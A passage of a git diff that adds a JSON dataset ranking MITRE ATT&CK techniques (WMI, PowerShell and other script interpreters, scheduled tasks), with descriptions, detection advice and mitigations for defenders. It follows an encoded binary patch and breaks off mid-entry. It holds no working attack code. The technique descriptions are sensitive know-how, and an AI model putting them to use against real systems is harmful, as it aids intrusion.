zf@fyXd!10fyU*e-6s3|*C4!M~GK-Y4V3>o6DQQR(5~Ir^z5bk5}Gr{1hi>T;0l0Z2Tl497i zt*0*y`Yd;E*U!#4gxGH5a6u;Pus<}}W-*$X68Kyg28byhyGY6Pp+CUZLuQ9xke?k` zAaFbz>DJkxV(VCK74<^VsEPg{s6oR^>KO_Y;I)(d4ei4-arZw{Y_;A9f(`PxM$RMq@P*@a& z7{S3jmJO=AX|sl{3!){hlT4Tnkcc7A2>~zM@d6>moQE1zPMAkwFXls(l+oDlV^jHU zY+0TwT_Ur4KP-#YkoW@B!l@J>E`>|QDf$a?s>RXSrYW(k<~vta8QysyDx+&V79yP} zgb|P|st^`qp{l{dw^sEfieqhb9%m-{wU=X^(E!X!N`+NQn$!RRs~^k7H*_&VSrO*= zF)A!)1pHaGRJCx_shmyEq8D2h1-&fHO#wvw8k#c=$`2}IIiyhf*emgOQTS{>M(yAe zg=Jo3S%;vednArTRDx6LhMT~jiFbN4tzHt}jBID)K=)vXnQFT|l1fx{f`xU8h~DV! z5~$qR@B1DObfv4kbBk)a6_y>hFtk)5alzErQv4VYd#e1>eeekne+!nHxfaEi=oj?| zn;<3L!84aJVv_<7b3h-GFtoY|)lzPYm%L{GTqI9}&$Wqx?(89ZXQS>xM3Vne710d8 zJKZbx1D$wN8BKZsq4}V@wqS}}%=h+3FDLUXR&2a2>dCTrW_T52OW?u$_6!n#TN#2w@z+UR_>c`InjV1yqJ8hr zKQ@Na8dyYl_F!=DNZZgV^V>CIk%N@z3pw@BQ9Pb8f87t`&*Ii?g=%*EdeUISKxJ|? zq6Ig4R8+VKY~_$v6vn~i{Ih+IfkwDSRmX^$s4|L>l^f>X$PzCMw$^~Jv`rAd+AJeQ z)~ocB$!`p;ktsxMjg)<&fa7~(B`BId-{%G6~ zd}L4l(y>+qA5>H6&e5@25sTjcJV*<2l&{-H zOrPOo%cfq&NRn^%z-XkN*xtI8-Sy{!=`@q#aAj=HyF>ENmbW26b&k6rvJZ!?$a43Q zV&bcG5S)xs0%JujsZ1W0x-=ba?j&a2t%z>>nm)*GS!(y#0KY;OF4{`4Bj@{TDfnsC zArvz*x8Q1qgwc2rHNN=pPpE?^NbZ{9^fUX*i<|a~Qfp}>y|33~)rBC)zm2}q)Z6@d zenOp-3hwY?iBn{*6#0eq{0FR+8rZA;D+nEpNY4z87Z#|L56L9ive$2JUXg=V2OAtK z6(U`!y-KZ_b?1K=>B8lk%Ta2d7L@)lVn_zd)$OL`#tov1m2@>ThO zG2QC$hgkeJ9lgGJ{+^x|3j( zqnJx?4+HN~!{6!xzSrmr-+qs>NPv|YelK0~pX3*rAZP#$Gcm=3tTf4lov~&M;wde7 zZBo@zfLsyoYu@XZ9P(5q#wO_s5pl%B_UmLo88ip#4>{G`tgCO%XliTv`GK+f9=NC% z9vBaLb#&oW@}$9EQU9)`8d28;{Dmtj@x#4ZyGNkANN_#Jh)l7zkXclW0Sv8~8;0Jv zR%Ob?*7PG!WoqX8owM_{%?#U1t`x>OR=(7@++*BAtb#WXKM>(+tg%Sc_Gbr+KD&O>P0MH)lO;ehvtu<>11pCJ!-U3#pb$9^D+W9&`c<-o|B*8? zEnO3yk-My9x5nRFwlWaI)nF(-lPy2?X>U@jkMiS$Mn}PPjAz@$K5mXG{{h{rgB3_* zZ@00bghD19Kja?YF>q^RM|~rGNBw_9zcb>-zGsn<#Gb%k5y76A51M81L;!lE z*VN#C|vko;(!b8kxCl#=Vpg1Y*h|-(-qi3BfqK_4^{ghT?pg% z%EPTJ_JO#%gdUpe9>WR5lxNwy8<7J>e?PbgFppBVbcZGsk`WC20*&M8xhRAgp(5r> z(NhvXDLMmZRqcd>LR&rFY&2DO+yx$NQzJO4W8V0l(420;VN_dN6N}+qALpidAZ|mZC2oZ)}_}6fKkK#%@{9DDmUK)h5 z6W-Pf-=h{O44gxCkJiq9kfiLYut4o&F{-g}%a&(Zq$e0vZ{I4&ZNykzx$z){vo>?2 zd>h$RI!EY}$b@{IQ^}&}%mF=-_Q!SQp%6nqj;wqm)b8Z`T}nHz130O>f2&J(6yW;P z`(3q^-_=a;JzMr)LjPa(##Rphl>7g4luQ4QU821I(NBCE3n*Z!Ck%w?d*ZBZn#oL!O5AoC*5nvtUD@xBN0?MTvDJOnf zsKC+H0tQ-mWJe}do-YOSdD}rA-;Pxw?ae-FS)M36V`xF<;yF275{(qrm{AU1c>;4Z zw}wl@k5eZd8^=#;!6*Gv5gQ`HSBUwSRH@r9c6fi6XR%8R#!*7#)eUt@?Ou=Zgyv!P zXiA87J=dnR(skHY%ZDNF4cLD-*`=LCLDKhsK*2u+egA`ke^mc}F5f7y_?BQnY`f=P z={f$&cx03cos-7iXa5P?fg>&{V>qTRWxnNAREz<^BPG1Wz!vPDvH;KG9tOd#0uPg) zzd1D1{c`_M13F+}Xk!{?w(ScS?A&4DW!nfya=i^zQ6#}l5uMewbVh|3Lnn(cW>!E@ zl}Z)QEN@#yerT)|aPnfy@nlh1!X4J>0(SaS5cl3C+qaERFhU2M|Bjry(JQ=za(E>Z z8g6wLV$cm6WNN9E=q}V0>Gf9i@o&W??sp*h|0fvyQ>6AkF!;YQ@V)&n80h~K29E!L z!5HN?3?SQZ#O=ln#?(*M{{sem|A4_m@K$pvAuS#y_Hh~p8o9WV#Af%=$#eTR4Cai~ zq|CPczBP~LbKct)h4eQl%w?sd?A0Or9gF7}5lOhCDW^t7C>8Uyu9+2YjRX&k*1w!u z*z}rN7C5mf_vXKc9QLwaR^M4(f^GIEk>lS{b2m~0ch$7FV2vwl=?De{ks_8BrIoJ0 z`R-pYyLP^N^?y}RbOadui243wYv1KxHJtzK4gSAA_hl8ugV4)}1YYGg8&7vUz02wg zqj&%^$Qf2xzI01ZxJ3XdwMi{-q542GmCZZul$RNuZ?G6o=dxK!dQ~{oru6j z=>O{D{6dH)QY7%h+O3|&s z?yG7tY>s&v8$^KnVn(&Yy>kj6(6w?~J=C+TdnmnHuwhv5o9hR|QCJkVoiih(2X53b z(z0y35_l&RDOH3 z`M+^eQ&p(O(~kqP7(5*su#ZBAatCx0BIRX~ZN&wiQYE8&KGkz+Jw)*x3^ql|;}R+5 zpp5di)Rj360eoMM8}!RoN-;Dwrh>Ep-f1S|kQCliM#`ZjCsKrL;v+&rJ1HP(bi@3= z?AY`EyGy|>4)WLQro{qgJ?OPeHAPq3n+!b?zak|>UKulWC4`ivZN$UOVb51xfFfz- z2Wu5+cDN3I*l(t15CSU#M;g`uvQ8d{XXf_Up=p4HA-Q%49_IWM*sd#G=IQP2jCIsn z`}_95J_Zdv_)T5|paQ%TJu7Zp!!tGt!NBtu-c+{0#Z(P$iTP6$z(5)`Y4gtx^c$1e zb!1z*3Q-<5ODWVL?92F%=dqt~Q67b2w&=?I)4xrVM*-`R22Pym+#KR>fJk zKL#kJP3dT>(UeGBmW|>PUS>r6|AW0VmI50Chu35e4QvWw6OfR>{qAFh%h$Z{Bx~GhdeSVrx;@$XgFL zbJk4ehyhsA#t_+%)6B}%0ym7nvMq)Pged}Pw&Wr%OvUmKMr~CnRS<(vpINf!Y0MIz!+6$Ir<|3)KNJV^JnMT(&dT5G hiz7mwHG7R`nSTzj+^sqa%%6GSrEMhS({*!j^bcT*_rU-F literal 0 HcmV?d00001 diff --git a/src/data/TopAttackTechniques.json b/src/data/TopAttackTechniques.json new file mode 100644 index 0000000..a86a07f --- /dev/null +++ b/src/data/TopAttackTechniques.json @@ -0,0 +1,12489 @@ +[ + { + "rank": 1, + "tid": "T1047", + "name": "Windows Management Instrumentation", + "description": "Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM). (Citation: MSDN WMI) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS. (Citation: MSDN WMI) (Citation: FireEye WMI 2015)\nAn adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)", + "url": "https://attack.mitre.org/techniques/T1047", + "detection": "Monitor network traffic for WMI connections; the use of WMI in environments that do not typically use WMI may be suspect. Perform process monitoring to capture command-line arguments of \"wmic\" and detect commands that are used to perform remote behavior. (Citation: FireEye WMI 2015)", + "score": 3.135766666666667, + "network_score": 0.2, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + } + ], + "subtechniques": [] + }, + { + "rank": 2, + "tid": "T1059", + "name": "Command and Scripting Interpreter", + "description": "Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell.\nThere are also cross-platform interpreters such as Python, as well as those commonly associated with client applications such as JavaScript and Visual Basic.\nAdversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in Initial Access payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various Remote Services in order to achieve remote Execution.(Citation: Powershell Remote Commands)(Citation: Cisco IOS Software Integrity Assurance - Command History)(Citation: Remote Shell Execution in Python)", + "url": "https://attack.mitre.org/techniques/T1059", + "detection": "Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.\nIf scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information discovery, collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.", + "score": 2.9571428571428573, + "process_score": 0.2, + "mitigations": [ + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1045", + "name": "Code Signing", + "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.", + "url": "https://attack.mitre.org/mitigations/M1045" + }, + { + "mid": "M1049", + "name": "Antivirus/Antimalware", + "description": "Use signatures or heuristics to detect malicious software.", + "url": "https://attack.mitre.org/mitigations/M1049" + } + ], + "subtechniques": [ + { + "tid": "T1059.001", + "name": "Command and Scripting Interpreter: PowerShell", + "description": "Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\nA number of PowerShell-based offensive testing tools are available, including Empire, PowerSploit, PoshC2, and PSAttack.(Citation: Github PSAttack)\nPowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)", + "url": "https://attack.mitre.org/techniques/T1059/001", + "detection": "If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.\nMonitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)\nIt is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1045", + "name": "Code Signing", + "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.", + "url": "https://attack.mitre.org/mitigations/M1045" + }, + { + "mid": "M1049", + "name": "Antivirus/Antimalware", + "description": "Use signatures or heuristics to detect malicious software.", + "url": "https://attack.mitre.org/mitigations/M1049" + } + ] + }, + { + "tid": "T1059.002", + "name": "Command and Scripting Interpreter: AppleScript", + "description": "Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.\nScripts can be run from the command-line via osascript /path/to/script or osascript -e \"script here\". Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding #!/usr/bin/osascript to the start of the script file.(Citation: SentinelOne AppleScript)\nAppleScripts do not need to call osascript to execute, however. They may be executed from within mach-O binaries by using the macOS Native APIs NSAppleScript or OSAScript, both of which execute code independent of the /usr/bin/osascript command line utility.\nAdversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute Native APIs, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team). Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via Python.(Citation: Macro Malware Targets Macs)", + "url": "https://attack.mitre.org/techniques/T1059/002", + "detection": "Monitor for execution of AppleScript through osascript and usage of the NSAppleScript and OSAScript APIs that may be related to other suspicious behavior occurring on the system. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.\nUnderstanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.", + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1045", + "name": "Code Signing", + "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.", + "url": "https://attack.mitre.org/mitigations/M1045" + } + ] + }, + { + "tid": "T1059.003", + "name": "Command and Scripting Interpreter: Windows Command Shell", + "description": "Adversaries may abuse the Windows command shell for execution. The Windows command shell (cmd) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via Remote Services such as SSH.(Citation: SSH in Windows)\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\nAdversaries may leverage cmd to execute various commands and payloads. Common uses include cmd to execute a single command, or abusing cmd interactively with input and output forwarded over a command and control channel.", + "url": "https://attack.mitre.org/techniques/T1059/003", + "detection": "Usage of the Windows command shell may be common on administrator, developer, or power user systems depending on job function. If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.", + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ] + }, + { + "tid": "T1059.004", + "name": "Command and Scripting Interpreter: Unix Shell", + "description": "Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.\nUnix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\nAdversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with SSH. Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.", + "url": "https://attack.mitre.org/techniques/T1059/004", + "detection": "Unix shell usage may be common on administrator, developer, or power user systems, depending on job function. If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information discovery, collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script. ", + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ] + }, + { + "tid": "T1059.005", + "name": "Command and Scripting Interpreter: Visual Basic", + "description": "Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as Component Object Model and the Native API through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)\nDerivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of JavaScript on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)\nAdversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into Spearphishing Attachment payloads.", + "url": "https://attack.mitre.org/techniques/T1059/005", + "detection": "Monitor for events associated with VB execution, such as Office applications spawning processes, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving VB payloads or scripts, or loading of modules associated with VB languages (ex: vbscript.dll). VB execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other programable post-compromise behaviors and could be used as indicators of detection leading back to the source.\nUnderstanding standard usage patterns is important to avoid a high number of false positives. If VB execution is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If VB execution is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Payloads and scripts should be captured from the file system when possible to determine their actions and intent.", + "mitigations": [ + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1049", + "name": "Antivirus/Antimalware", + "description": "Use signatures or heuristics to detect malicious software.", + "url": "https://attack.mitre.org/mitigations/M1049" + } + ] + }, + { + "tid": "T1059.006", + "name": "Command and Scripting Interpreter: Python", + "description": "Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the python.exe interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.\nPython comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.", + "url": "https://attack.mitre.org/techniques/T1059/006", + "detection": "Monitor systems for abnormal Python usage and python.exe behavior, which could be an indicator of malicious activity. Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.", + "mitigations": [ + { + "mid": "M1033", + "name": "Limit Software Installation", + "description": "Block users or groups from installing unapproved software.", + "url": "https://attack.mitre.org/mitigations/M1033" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1049", + "name": "Antivirus/Antimalware", + "description": "Use signatures or heuristics to detect malicious software.", + "url": "https://attack.mitre.org/mitigations/M1049" + } + ] + }, + { + "tid": "T1059.007", + "name": "Command and Scripting Interpreter: JavaScript", + "description": "Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)\nJScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the Component Object Model and Internet Explorer HTML Application (HTA) pages.(Citation: JScrip May 2018)(Citation: Microsoft JScript 2007)(Citation: Microsoft Windows Scripts)\nJavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of Apple’s Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apple’s OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apple’s internal APIs. As of OSX 10.10, OSA only supports two languages, JXA and AppleScript. Scripts can be executed via the command line utility osascript, they can be compiled into applications or script files via osacompile, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.(Citation: Apple About Mac Scripting 2016)(Citation: SpecterOps JXA 2020)(Citation: SentinelOne macOS Red Team)(Citation: Red Canary Silver Sparrow Feb2021)(Citation: MDSec macOS JXA and VSCode)\nAdversaries may abuse various implementations of JavaScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a Drive-by Compromise or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of Obfuscated Files or Information.", + "url": "https://attack.mitre.org/techniques/T1059/007", + "detection": "Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.\nMonitor for execution of JXA through osascript and usage of OSAScript API that may be related to other suspicious behavior occurring on the system.\nUnderstanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.", + "mitigations": [ + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ] + }, + { + "tid": "T1059.008", + "name": "Command and Scripting Interpreter: Network Device CLI", + "description": "Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands. \nScripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or SSH.\nAdversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection. (Citation: Cisco Synful Knock Evolution)", + "url": "https://attack.mitre.org/techniques/T1059/008", + "detection": "Consider reviewing command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration.(Citation: Cisco IOS Software Integrity Assurance - Command History)\nConsider comparing a copy of the network device configuration against a known-good version to discover unauthorized changes to the command interpreter. The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor.", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ] + } + ] + }, + { + "rank": 3, + "tid": "T1053", + "name": "Scheduled Task/Job", + "description": "Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member 